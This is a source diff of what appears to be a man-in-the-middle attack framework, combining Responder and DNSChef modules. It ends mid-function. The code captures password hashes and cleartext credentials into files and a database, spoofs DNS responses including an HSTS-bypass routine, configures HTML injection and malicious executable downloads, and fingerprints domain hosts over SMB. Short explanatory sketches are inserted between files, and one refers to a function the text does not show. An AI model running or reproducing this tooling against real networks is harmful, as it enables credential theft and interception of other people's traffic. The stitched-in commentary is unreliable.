self.HtmlToInject = self.config['Responder']['HTTP Server']['HTMLToInject']
self.Exe_Filename = self.config['Responder']['HTTP Server']['ExeFilename']
self.Exe_DlName = self.config['Responder']['HTTP Server']['ExeDownloadName']
self.WPAD_Script = self.config['Responder']['HTTP Server']['WPADScript']
if not os.path.exists(self.Html_Filename):
print "Warning: %s: file not found" % self.Html_Filename
if not os.path.exists(self.Exe_Filename):
print "Warning: %s: file not found" % self.Exe_Filename
# SSL Options
self.SSLKey = self.config['Responder']['HTTPS Server']['SSLKey']
self.SSLCert = self.config['Responder']['HTTPS Server']['SSLCert']
# Respond to hosts
self.RespondTo = filter(None, [x.upper().strip() for x in self.config['Responder']['RespondTo'].strip().split(',')])
self.RespondToName = filter(None, [x.upper().strip() for x in self.config['Responder']['RespondToName'].strip().split(',')])
self.DontRespondTo = filter(None, [x.upper().strip() for x in self.config['Responder']['DontRespondTo'].strip().split(',')])
self.DontRespondToName = filter(None, [x.upper().strip() for x in self.config['Responder']['DontRespondToName'].strip().split(',')])
# CLI options
self.Interface = options.interface
self.Force_WPAD_Auth = options.forcewpadauth
self.LM_On_Off = options.lm
self.WPAD_On_Off = options.wpad
self.Wredirect = options.wredir
self.NBTNSDomain = options.nbtns
self.Basic = options.basic
self.Finger_On_Off = options.finger
self.AnalyzeMode = options.analyze
#self.Upstream_Proxy = options.Upstream_Proxy
self.Verbose = False
if options.log_level == 'debug':
self.Verbose = True
self.Bind_To = utils.FindLocalIP(self.Interface)
self.IP_aton = socket.inet_aton(self.Bind_To)
self.Os_version = sys.platform
# Set up Challenge
self.NumChal = self.config['Responder']['Challenge']
if len(self.NumChal) != 16:
print "The challenge must be exactly 16 chars long.\nExample: 1122334455667788"
sys.exit(-1)
self.Challenge = ""
for i in range(0, len(self.NumChal),2):
self.Challenge += self.NumChal[i:i+2].decode("hex")
# Set up logging
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
self.ResponderLogger = logger().setup_logger("Responder", formatter, self.SessionLogFile)
#logging.warning('Responder Started: {}'.format(self.CommandLine))
#logging.warning('Responder Config: {}'.format(self))
self.PoisonersLogger = logger().setup_logger("Poison log", formatter, self.PoisonersLogFile)
self.AnalyzeLogger = logger().setup_logger("Analyze Log", formatter, self.AnalyzeLogFile)
Config = Settings()
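ExpandIPRanges above stores a low/high bound for each octet and nests four loops over them, so one config entry can describe a whole block of hosts. A sketch of what the expansion yields, driving it through the module-level Config object (assumes the package is importable; the ranges are made up):

# Sketch: driving the octet-range expansion through the shared Config object (made-up ranges)
import core.responder.settings as settings

settings.Config.RespondTo     = ['10.0.1-2.5-6']     # each octet is a plain value or a low-high range
settings.Config.DontRespondTo = []
settings.Config.ExpandIPRanges()
print(settings.Config.RespondTo)
# ['10.0.1.5', '10.0.1.6', '10.0.2.5', '10.0.2.6']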

247
core/responder/utils.py Normal file

@ -0,0 +1,247 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import re
import logging
import socket
import time
import settings
import sqlite3
def RespondToThisIP(ClientIp):
if ClientIp.startswith('127.0.0.'):
return False
if len(settings.Config.RespondTo) and ClientIp not in settings.Config.RespondTo:
return False
if ClientIp in settings.Config.RespondTo or settings.Config.RespondTo == []:
if ClientIp not in settings.Config.DontRespondTo:
return True
return False
def RespondToThisName(Name):
if len(settings.Config.RespondToName) and Name.upper() not in settings.Config.RespondToName:
return False
if Name.upper() in settings.Config.RespondToName or settings.Config.RespondToName == []:
if Name.upper() not in settings.Config.DontRespondToName:
return True
return False
def RespondToThisHost(ClientIp, Name):
return (RespondToThisIP(ClientIp) and RespondToThisName(Name))
def IsOsX():
return True if settings.Config.Os_version == "darwin" else False
def OsInterfaceIsSupported():
if settings.Config.Interface != "Not set":
return False if IsOsX() else True
else:
return False
def FindLocalIP(Iface):
if Iface == 'ALL':
return '0.0.0.0'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, 25, Iface+'\0')
s.connect(("127.0.0.1",9))#RFC 863
ret = s.getsockname()[0]
s.close()
return ret
except socket.error:
sys.exit(-1)
# Function used to write captured hashes to a file.
def WriteData(outfile, data, user):
settings.Config.ResponderLogger.info("[*] Captured Hash: %s" % data)
if os.path.isfile(outfile) == False:
with open(outfile,"w") as outf:
outf.write(data)
outf.write("\n")
outf.close()
else:
with open(outfile,"r") as filestr:
if re.search(user.encode('hex'), filestr.read().encode('hex')):
filestr.close()
return False
if re.search(re.escape("$"), user):
filestr.close()
return False
with open(outfile,"a") as outf2:
outf2.write(data)
outf2.write("\n")
outf2.close()
def SaveToDb(result):
# Creating the DB if it doesn't exist
if not os.path.exists(settings.Config.DatabaseFile):
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.execute('CREATE TABLE responder (timestamp varchar(32), module varchar(16), type varchar(16), client varchar(32), hostname varchar(32), user varchar(32), cleartext varchar(128), hash varchar(512), fullhash varchar(512))')
cursor.commit()
cursor.close()
for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
if not k in result:
result[k] = ''
if len(result['user']) < 2:
return
if len(result['cleartext']):
fname = '%s-%s-ClearText-%s.txt' % (result['module'], result['type'], result['client'])
else:
fname = '%s-%s-%s.txt' % (result['module'], result['type'], result['client'])
timestamp = time.strftime("%d-%m-%Y %H:%M:%S")
logfile = os.path.join('./logs/responder', fname)
cursor = sqlite3.connect(settings.Config.DatabaseFile)
res = cursor.execute("SELECT COUNT(*) AS count FROM responder WHERE module=? AND type=? AND LOWER(user)=LOWER(?)", (result['module'], result['type'], result['user']))
(count,) = res.fetchone()
if count == 0:
# Write JtR-style hash string to file
with open(logfile,"a") as outf:
outf.write(result['fullhash'])
outf.write("\n")
outf.close()
# Update database
cursor.execute("INSERT INTO responder VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?)", (timestamp, result['module'], result['type'], result['client'], result['hostname'], result['user'], result['cleartext'], result['hash'], result['fullhash']))
cursor.commit()
cursor.close()
# Print output
if count == 0 or settings.Config.Verbose:
if len(result['client']):
settings.Config.ResponderLogger.info("[%s] %s Client : %s" % (result['module'], result['type'], result['client']))
if len(result['hostname']):
settings.Config.ResponderLogger.info("[%s] %s Hostname : %s" % (result['module'], result['type'], result['hostname']))
if len(result['user']):
settings.Config.ResponderLogger.info("[%s] %s Username : %s" % (result['module'], result['type'], result['user']))
# By order of priority, print cleartext, fullhash, or hash
if len(result['cleartext']):
settings.Config.ResponderLogger.info("[%s] %s Password : %s" % (result['module'], result['type'], result['cleartext']))
elif len(result['fullhash']):
settings.Config.ResponderLogger.info("[%s] %s Hash : %s" % (result['module'], result['type'], result['fullhash']))
elif len(result['hash']):
settings.Config.ResponderLogger.info("[%s] %s Hash : %s" % (result['module'], result['type'], result['hash']))
else:
settings.Config.PoisonersLogger.warning('Skipping previously captured hash for %s' % result['user'])
def Parse_IPV6_Addr(data):
if data[len(data)-4:len(data)][1] =="\x1c":
return False
elif data[len(data)-4:len(data)] == "\x00\x01\x00\x01":
return True
elif data[len(data)-4:len(data)] == "\x00\xff\x00\x01":
return True
else:
return False
def Decode_Name(nbname):
#From http://code.google.com/p/dpkt/ with author's permission.
try:
from string import printable
if len(nbname) != 32:
return nbname
l = []
for i in range(0, 32, 2):
l.append(chr(((ord(nbname[i]) - 0x41) << 4) | ((ord(nbname[i+1]) - 0x41) & 0xf)))
return filter(lambda x: x in printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
except:
return "Illegal NetBIOS name"
def NBT_NS_Role(data):
Role = {
"\x41\x41\x00":"Workstation/Redirector",
"\x42\x4c\x00":"Domain Master Browser",
"\x42\x4d\x00":"Domain Controller",
"\x42\x4e\x00":"Local Master Browser",
"\x42\x4f\x00":"Browser Election",
"\x43\x41\x00":"File Server",
"\x41\x42\x00":"Browser",
}
return Role[data] if data in Role else "Service not known"
# Useful for debugging
def hexdump(src, l=0x16):
res = []
sep = '.'
src = str(src)
for i in range(0, len(src), l):
s = src[i:i+l]
hexa = ''
for h in range(0,len(s)):
if h == l/2:
hexa += ' '
h = s[h]
if not isinstance(h, int):
h = ord(h)
h = hex(h).replace('0x','')
if len(h) == 1:
h = '0'+h
hexa += h + ' '
hexa = hexa.strip(' ')
text = ''
for c in s:
if not isinstance(c, int):
c = ord(c)
if 0x20 <= c < 0x7F:
text += chr(c)
else:
text += sep
res.append(('%08X: %-'+str(l*(2+1)+1)+'s |%s|') % (i, hexa, text))
return '\n'.join(res)
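Decode_Name above reverses NetBIOS first-level encoding, in which every raw byte is split into two nibbles and each nibble is stored as 'A' plus its value; a short round-trip with a made-up name (the encoder below exists only for the example):

# Illustrative round-trip against Decode_Name above (name and encoder are made up for the example)
def encode_nb_name(name):
    padded = name.ljust(16)                          # NetBIOS names are space-padded to 16 bytes
    out = ''
    for ch in padded:
        out += chr((ord(ch) >> 4) + 0x41)            # high nibble -> 'A'..'P'
        out += chr((ord(ch) & 0x0f) + 0x41)          # low nibble  -> 'A'..'P'
    return out                                       # 32 encoded bytes

encoded = encode_nb_name('FILESERVER')
print(encoded)              # EGEJEMEFFDEFFCFGEFFCCACACACACACA
print(Decode_Name(encoded)) # FILESERVER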


@ -1,13 +0,0 @@
Originally, sergio-proxy was a standalone implementation of a
transparent proxy using the Twisted networking framework
for Python. However, sslstrip uses almost *exactly* the
same interception method, so I decided to use sslstrip's
more mature libraries and try to provide a simple plugin
interface to grab the data.
The only file that has been modified from sslstrip is the
ServerConnection.py file, from which we can hook at certain
important points during the intercept.
Copyright 2011, Ben Schmidt
Released under the GPLv3

224
core/servers/Browser.py Normal file

@ -0,0 +1,224 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import struct
import threading
import core.responder.settings as settings
from core.responder.packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.utils import *
def start():
try:
server = ThreadingUDPServer(('', 138), Browser1)
t = threading.Thread(name='Browser', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting Browser server on port 138: {}".format(e)
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
def WorkstationFingerPrint(data):
Role = {
"\x04\x00" :"Windows 95",
"\x04\x10" :"Windows 98",
"\x04\x90" :"Windows ME",
"\x05\x00" :"Windows 2000",
"\x05\x00" :"Windows XP",
"\x05\x02" :"Windows 2003",
"\x06\x00" :"Windows Vista/Server 2008",
"\x06\x01" :"Windows 7/Server 2008R2",
}
return Role[data] if data in Role else "Unknown"
def RequestType(data):
Type = {
"\x01": 'Host Announcement',
"\x02": 'Request Announcement',
"\x08": 'Browser Election',
"\x09": 'Get Backup List Request',
"\x0a": 'Get Backup List Response',
"\x0b": 'Become Backup Browser',
"\x0c": 'Domain/Workgroup Announcement',
"\x0d": 'Master Announcement',
"\x0e": 'Reset Browser State Announcement',
"\x0f": 'Local Master Announcement',
}
return Type[data] if data in Type else "Unknown"
def PrintServerName(data, entries):
if entries > 0:
entrieslen = 26*entries
chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries
ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)]
l = []
for x in ServerName:
FP = WorkstationFingerPrint(x[16:18])
Name = x[:16].replace('\x00', '')
if FP:
l.append(Name + ' (%s)' % FP)
else:
l.append(Name)
return l
return None
def ParsePacket(Payload):
PayloadOffset = struct.unpack('<H',Payload[51:53])[0]
StatusCode = Payload[PayloadOffset-4:PayloadOffset-2]
if StatusCode == "\x00\x00":
EntriesNum = struct.unpack('<H',Payload[PayloadOffset:PayloadOffset+2])[0]
return PrintServerName(Payload[PayloadOffset+4:], EntriesNum)
else:
return None
def RAPThisDomain(Client,Domain):
PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
if PDC is not None:
settings.Config.ResponderLogger.info("[LANMAN] Detected Domains: %s" % ', '.join(PDC))
SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
if SQL is not None:
settings.Config.ResponderLogger.info("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL)))
WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
if WKST is not None:
settings.Config.ResponderLogger.info("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST)))
def RapFinger(Host, Domain, Type):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((Host,445))
s.settimeout(0.3)
Header = SMBHeader(cmd="\x72",mid="\x01\x00")
Body = SMBNegoData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Session Setup AndX Request, Anonymous.
if data[8:10] == "\x72\x00":
Header = SMBHeader(cmd="\x73",mid="\x02\x00")
Body = SMBSessionData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Tree Connect IPC$.
if data[8:10] == "\x73\x00":
Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34],mid="\x03\x00")
Body = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$")
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Rap ServerEnum.
if data[8:10] == "\x75\x00":
Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00")
Body = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(64736)
# Rap ServerEnum, Get answer and return what we're looking for.
if data[8:10] == "\x25\x00":
s.close()
return ParsePacket(data)
except:
pass
def BecomeBackup(data,Client):
try:
DataOffset = struct.unpack('<H',data[139:141])[0]
BrowserPacket = data[82+DataOffset:]
ReqType = RequestType(BrowserPacket[0])
if ReqType == "Become Backup Browser":
ServerName = BrowserPacket[1:]
Domain = Decode_Name(data[49:81])
Name = Decode_Name(data[15:47])
Role = NBT_NS_Role(data[45:48])
if settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain))
print RAPThisDomain(Client, Domain)
except:
pass
def ParseDatagramNBTNames(data,Client):
try:
Domain = Decode_Name(data[49:81])
Name = Decode_Name(data[15:47])
Role1 = NBT_NS_Role(data[45:48])
Role2 = NBT_NS_Role(data[79:82])
if Role2 == "Domain Controller" or Role2 == "Browser Election" or Role2 == "Local Master Browser" and settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client, Name, Role1, Domain, Role2))
print RAPThisDomain(Client, Domain)
except:
pass
class Browser1(BaseRequestHandler):
def handle(self):
try:
request, socket = self.request
if settings.Config.AnalyzeMode:
ParseDatagramNBTNames(request,self.client_address[0])
BecomeBackup(request,self.client_address[0])
BecomeBackup(request,self.client_address[0])
except Exception:
pass

522
core/servers/DNS.py Executable file

@ -0,0 +1,522 @@
# DNSChef is a highly configurable DNS Proxy for Penetration Testers
# and Malware Analysts. Please visit http://thesprawl.org/projects/dnschef/
# for the latest version and documentation. Please forward all issues and
# concerns to iphelix [at] thesprawl.org.
# Copyright (C) 2015 Peter Kacherginsky, Marcello Salvati
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import threading, random, operator, time
import SocketServer, socket, sys, os
import binascii
import string
import base64
import time
import logging
from configobj import ConfigObj
from core.configwatcher import ConfigWatcher
from core.utils import shutdown
from core.logger import logger
from dnslib import *
from IPy import IP
formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DNSChef", formatter)
dnslog = logging.getLogger('dnslog')
handler = logging.FileHandler('./logs/dns/dns.log',)
handler.setFormatter(formatter)
dnslog.addHandler(handler)
dnslog.setLevel(logging.INFO)
# DNSHandler Mixin. The class contains generic functions to parse DNS requests and
# calculate an appropriate response based on user parameters.
class DNSHandler():
def parse(self,data):
nametodns = DNSChef().nametodns
nameservers = DNSChef().nameservers
hsts = DNSChef().hsts
hstsconfig = DNSChef().real_records
server_address = DNSChef().server_address
clientip = {"clientip": self.client_address[0]}
response = ""
try:
# Parse data as DNS
d = DNSRecord.parse(data)
except Exception as e:
log.info("Error: invalid DNS request", extra=clientip)
dnslog.info("Error: invalid DNS request", extra=clientip)
else:
# Only Process DNS Queries
if QR[d.header.qr] == "QUERY":
# Gather query parameters
# NOTE: Do not lowercase qname here, because we want to see
# any case request weirdness in the logs.
qname = str(d.q.qname)
# Chop off the last period
if qname[-1] == '.': qname = qname[:-1]
qtype = QTYPE[d.q.qtype]
# Find all matching fake DNS records for the query name or get False
fake_records = dict()
for record in nametodns:
fake_records[record] = self.findnametodns(qname, nametodns[record])
if hsts:
if qname in hstsconfig:
response = self.hstsbypass(hstsconfig[qname], qname, nameservers, d)
return response
elif qname[:4] == 'wwww':
response = self.hstsbypass(qname[1:], qname, nameservers, d)
return response
elif qname[:3] == 'web':
response = self.hstsbypass(qname[3:], qname, nameservers, d)
return response
# Check if there is a fake record for the current request qtype
if qtype in fake_records and fake_records[qtype]:
fake_record = fake_records[qtype]
# Create a custom response to the query
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
log.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
dnslog.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
# IPv6 needs additional work before inclusion:
if qtype == "AAAA":
ipv6 = IP(fake_record)
ipv6_bin = ipv6.strBin()
ipv6_hex_tuple = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](ipv6_hex_tuple)))
elif qtype == "SOA":
mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
# dnslib doesn't like trailing dots
if mname[-1] == ".": mname = mname[:-1]
if rname[-1] == ".": rname = rname[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
elif qtype == "NAPTR":
order,preference,flags,service,regexp,replacement = fake_record.split(" ")
order = int(order)
preference = int(preference)
# dnslib doesn't like trailing dots
if replacement[-1] == ".": replacement = replacement[:-1]
response.add_answer( RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,DNSLabel(replacement))) )
elif qtype == "SRV":
priority, weight, port, target = fake_record.split(" ")
priority = int(priority)
weight = int(weight)
port = int(port)
if target[-1] == ".": target = target[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
elif qtype == "DNSKEY":
flags, protocol, algorithm, key = fake_record.split(" ")
flags = int(flags)
protocol = int(protocol)
algorithm = int(algorithm)
key = base64.b64decode(("".join(key)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
elif qtype == "RRSIG":
covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
algorithm = int(algorithm)
labels = int(labels)
orig_ttl = int(orig_ttl)
sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
key_tag = int(key_tag)
if name[-1] == '.': name = name[:-1]
sig = base64.b64decode(("".join(sig)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig)))
else:
# dnslib doesn't like trailing dots
if fake_record[-1] == ".": fake_record = fake_record[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
response = response.pack()
elif qtype == "*" and not None in fake_records.values():
log.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
dnslog.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)
for qtype,fake_record in fake_records.items():
if fake_record:
# NOTE: RDMAP is a dictionary map of qtype strings to handling classses
# IPv6 needs additional work before inclusion:
if qtype == "AAAA":
ipv6 = IP(fake_record)
ipv6_bin = ipv6.strBin()
fake_record = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
elif qtype == "SOA":
mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
# dnslib doesn't like trailing dots
if mname[-1] == ".": mname = mname[:-1]
if rname[-1] == ".": rname = rname[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
elif qtype == "NAPTR":
order,preference,flags,service,regexp,replacement = fake_record.split(" ")
order = int(order)
preference = int(preference)
# dnslib doesn't like trailing dots
if replacement and replacement[-1] == ".": replacement = replacement[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,replacement)))
elif qtype == "SRV":
priority, weight, port, target = fake_record.split(" ")
priority = int(priority)
weight = int(weight)
port = int(port)
if target[-1] == ".": target = target[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
elif qtype == "DNSKEY":
flags, protocol, algorithm, key = fake_record.split(" ")
flags = int(flags)
protocol = int(protocol)
algorithm = int(algorithm)
key = base64.b64decode(("".join(key)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
elif qtype == "RRSIG":
covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
algorithm = int(algorithm)
labels = int(labels)
orig_ttl = int(orig_ttl)
sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
key_tag = int(key_tag)
if name[-1] == '.': name = name[:-1]
sig = base64.b64decode(("".join(sig)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig) ))
else:
# dnslib doesn't like trailing dots
if fake_record[-1] == ".": fake_record = fake_record[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
response = response.pack()
# Proxy the request
else:
log.debug("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
dnslog.info("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
nameserver_tuple = random.choice(nameservers).split('#')
response = self.proxyrequest(data, *nameserver_tuple)
return response
# Find the appropriate ip address (or False) to use for a queried name;
# configured domain patterns may contain '*' wildcards.
def findnametodns(self,qname,nametodns):
# Make qname case insensitive
qname = qname.lower()
# Split and reverse qname into components for matching.
qnamelist = qname.split('.')
qnamelist.reverse()
# HACK: Iterate the nametodns dictionary in sorted order so that the global
# wildcard entry ['*.*.*.*.*.*.*.*.*.*'] is matched last.
for domain,host in sorted(nametodns.iteritems(), key=operator.itemgetter(1)):
# NOTE: Domain names are assumed to have been lowercased already when they were
# loaded through --file, --fakedomains or --truedomains, so we don't waste time
# lowercasing them on every request.
# Split and reverse domain into components for matching
domain = domain.split('.')
domain.reverse()
# Compare domains in reverse.
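# map(None, ...) zips the two label lists, padding the shorter one with None
# (Python 2 idiom), so length mismatches only match against '*' wildcards.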
for a,b in map(None,qnamelist,domain):
if a != b and b != "*":
break
else:
# Could be a real IP or False if we are doing reverse matching with 'truedomains'
return host
else:
return False
# Obtain a response from a real DNS server.
def proxyrequest(self, request, host, port="53", protocol="udp"):
clientip = {'clientip': self.client_address[0]}
reply = None
try:
if DNSChef().ipv6:
if protocol == "udp":
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
elif protocol == "tcp":
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
if protocol == "udp":
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
elif protocol == "tcp":
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3.0)
# Send the proxy request to a randomly chosen DNS server
if protocol == "udp":
sock.sendto(request, (host, int(port)))
reply = sock.recv(1024)
sock.close()
elif protocol == "tcp":
sock.connect((host, int(port)))
# Add length for the TCP request
length = binascii.unhexlify("%04x" % len(request))
sock.sendall(length+request)
# Strip length from the response
reply = sock.recv(1024)
reply = reply[2:]
sock.close()
except Exception as e:
log.warning("Could not proxy request: {}".format(e), extra=clientip)
dnslog.info("Could not proxy request: {}".format(e), extra=clientip)
else:
return reply
def hstsbypass(self, real_domain, fake_domain, nameservers, d):
clientip = {'clientip': self.client_address[0]}
log.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
dnslog.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
nameserver_tuple = random.choice(nameservers).split('#')
#First proxy the request with the real domain
q = DNSRecord.question(real_domain).pack()
r = self.proxyrequest(q, *nameserver_tuple)
if r is None: return None
#Parse the answer
dns_rr = DNSRecord.parse(r).rr
#Create the DNS response
for res in dns_rr:
if res.get_rname() == real_domain:
res.set_rname(fake_domain)
response.add_answer(res)
else:
response.add_answer(res)
return response.pack()
# UDP DNS Handler for incoming requests
class UDPHandler(DNSHandler, SocketServer.BaseRequestHandler):
def handle(self):
(data,socket) = self.request
response = self.parse(data)
if response:
socket.sendto(response, self.client_address)
# TCP DNS Handler for incoming requests
class TCPHandler(DNSHandler, SocketServer.BaseRequestHandler):
def handle(self):
data = self.request.recv(1024)
# Remove the additional "length" parameter used in the
# TCP DNS protocol
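# (RFC 1035 section 4.2.2: DNS messages over TCP are prefixed with a
# two-byte big-endian length field, stripped here and re-added to the response below.)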
data = data[2:]
response = self.parse(data)
if response:
